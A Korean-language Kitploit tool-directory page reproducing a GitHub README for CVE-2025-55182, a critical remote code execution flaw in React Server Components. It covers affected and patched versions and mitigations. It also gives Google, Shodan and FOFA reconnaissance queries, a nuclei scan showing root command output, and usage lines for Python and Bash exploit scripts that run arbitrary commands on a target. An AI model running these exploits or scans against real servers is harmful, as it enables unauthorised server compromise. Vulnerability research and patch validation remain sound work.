Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182 — 다수의 패키지 내 React Server Components (RSC) 구현에 영향을 미치는 중요한 원격 코드 실행(RCE) 취약점 포함. | Kitploit
도구/GitHubGitHub/cyberleelawat/cve-2025-55182
Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & EducationPayload Development
GitHubcyberleelawat/cve-2025-55182

CVE-2025-55182

다수의 패키지 내 React Server Components (RSC) 구현에 영향을 미치는 중요한 원격 코드 실행(RCE) 취약점 포함.

저장소 보기
112개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 – React Server Components 원격 코드 실행

React2Shell Banner CVE-2025-55182 CVE-2025-66478 CVSS

제작자 : Virendra Kumar

회사 : Cyber Leelawat

웹사이트 :

www.cyberleelawat.in

개요

CVE-2025-55182는 React Server Components (RSC) 구현체에 영향을 미치는 심각한 원격 코드 실행(RCE) 취약점으로, 다음 패키지를 포함합니다:

  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

이 취약점은 RSC가 사용하는 내부 Flight 프로토콜을 통해 전송된 페이로드의 안전하지 않은 역직렬화로 인해 발생합니다. 신뢰할 수 없는 입력이 HTTP 요청을 통해 React Server Components로 전달되면 서버 측 코드 실행이 트리거될 수 있습니다.

영향을 받는 버전:

  • 19.0.0
  • 19.1.0
  • 19.1.1
  • 19.2.0

패치된 버전:

  • 19.0.1
  • 19.1.2
  • 19.2.1

취약점 작동 방식 (개괄)

React Server Components는 클라이언트 측 요청을 수신하여 백엔드에서 파싱 및 역직렬화합니다. 취약점은 인바운드 데이터의 역직렬화에 대한 제어가 불충분하여 특수하게 조작된 페이로드가 실행 가능한 서버 측 구성 요소로 해석될 수 있는 데서 비롯됩니다.

이 경우 서버에서 임의의 JavaScript 실행이 발생할 수 있으며, 호스팅 환경과 권한에 따라 서버 전체가 손상될 수 있습니다.


근본 원인

  • RSC Flight 프로토콜 스트림에서 적절한 입력 검증 부족
  • 서버 신뢰 경계가 안전하다고 잘못 가정됨
  • 신뢰할 수 없는 사용자 입력으로 인한 안전하지 않은 서버 측 파싱

영향

공격에 성공하면 공격자는 다음을 수행할 수 있습니다:

  • 원격 코드 실행 달성
  • 임의의 서버 측 명령 실행
  • 데이터베이스 또는 OS 수준 리소스에 접근
  • 악성코드 또는 백도어 설치
  • 민감한 데이터 탈취
  • 인프라 내 측면 이동 수행

CVSS 점수: 10.0 – CRITICAL


수동 테스트 (안전한 방어적 식별)

주요 목표:

애플리케이션이 React Server Components를 노출하는지, 영향을 받는 버전이 사용 중인지 확인합니다.

1단계 — 응답 특성을 통해 RSC 존재 확인

root@kitploit:~
curl -I https://target.com/?__rsc=1

Google 정찰 (방어적 키워드)

이 키워드는 공개 저장소나 웹 애플리케이션이 RSC 구성 요소를 참조하는지 식별하는 데 도움이 됩니다.

root@kitploit:~
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"

확인:

  • RSC 기능이 존재하는가?
  • 프론트엔드 번들에서 패키지가 보이는가?
  • 공개 Git 참조가 있는가?

내부 Google 쿼리 예시 (자체 범위만)

root@kitploit:~
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"

조직 도메인의 내부 감사 목적으로만 사용하십시오.


Shodan (안전한 기술 지문 식별)

노출된 프레임워크 사용 여부를 확인하며, 취약점 악용이 아닙니다.

root@kitploit:~
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=

FOFA 기술 분류 전용

root@kitploit:~
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"

자동화 테스트 (내부 / 실험실)

방어적 스캐닝을 자동화하려면 템플릿 기반 탐지 로직을 복제하여 자체 인프라 평가에 사용하십시오:

root@kitploit:~
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182

Nuclei 템플릿

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Python RCE 익스플로잇 (CVE-2025-55182.py)

임의의 명령을 실행하고 출력을 검색하는 완전한 기능의 RCE 익스플로잇 스크립트입니다.

사용법:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Bash 익스플로잇

설치

root@kitploit:~
chmod +x scanner.sh

사용법

root@kitploit:~
# 기본 명령(id)으로 스캔
./scanner.sh -d example.com

# 사용자 정의 명령 실행
./scanner.sh -d example.com -c "whoami"

# 전체 URL 사용
./scanner.sh -d https://example.com -c "uname -a"

옵션

  • -d, --domain - 대상 도메인/URL (필수)
  • -c, --command - 실행할 명령 (기본값: id)

예시

root@kitploit:~
# 대상이 취약한지 확인
./scanner.sh -d vulnerable-app.com

# 시스템 정보 확인
./scanner.sh -d vulnerable-app.com -c "uname -a"

# 파일 목록 보기
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

요구 사항

  • Bash

  • curl

  • openssl

    크레딧: Bash 및 Python 스크립트는 원래 @zack0x01 및 @sickwell이 제작했습니다. 감사히 사용합니다.

저장소 내 템플릿은 다음 용도로 사용됩니다:

  • 버전 식별
  • 가시성 확인
  • 인프라 인벤토리
  • 취약점 인식

중요: 이 템플릿은 귀하가 소유하거나 평가 권한이 있는 시스템에서만 실행해야 합니다.


Nuclei (방어적 사용 설명)

이 저장소에 포함된 Nuclei 템플릿은 다음 용도로만 사용됩니다:

  • 종속성 버전 검증
  • 간접 지문 식별
  • 수동적 확인
  • 내부 보안 감사

다음을 확인하십시오:

  • 서면 승인을 받았는지
  • 자신의 자산만 스캔하고 있는지
  • 현지 법률 및 정책을 준수하는지

권장 완화 조치

즉시 업데이트

패치된 릴리스 중 하나로 업그레이드하십시오:

  • 19.0.1
  • 19.1.2
  • 19.2.1

즉시 패치할 수 없는 경우

  • RSC 기능을 일시적으로 비활성화
  • 서버 구성 요소 격리
  • WAF 규칙 구현
  • 노출된 네트워크 표면 제한

🤝 연락하기

👨‍💻 Cyber Leelawat

보안 연구원 • 사이버 보안 트레이너 • 버그 바운티 헌터

좌우명: Zero Trust Full Secure 🚀

GitHub Instagram
LinkedIn WhatsApp Channel
WhatsApp Group

결론

CVE-2025-55182는 현재 React 기반 인프라에 대한 가장 심각한 위협 중 하나입니다. 간단한 익스플로잇 벡터와 인증되지 않은 공격 표면으로 인해 즉시 패치를 강력히 권장합니다. 영향을 받는 RSC 버전을 실행하는 모든 조직은 긴급 우선 순위를 고려해야 합니다.


법적 / 윤리적 고지

이 저장소와 문서는 귀하가 소유한 자산의 방어적 연구 및 보안 검증을 위한 것입니다. 오용 시 불법일 수 있습니다. 귀하는 법률 및 조직 정책을 준수할 책임이 있습니다.

Made with ❤️ by Cyber Leelawat

Zero Trust Full Secure 🎯🔐

도구 다운로드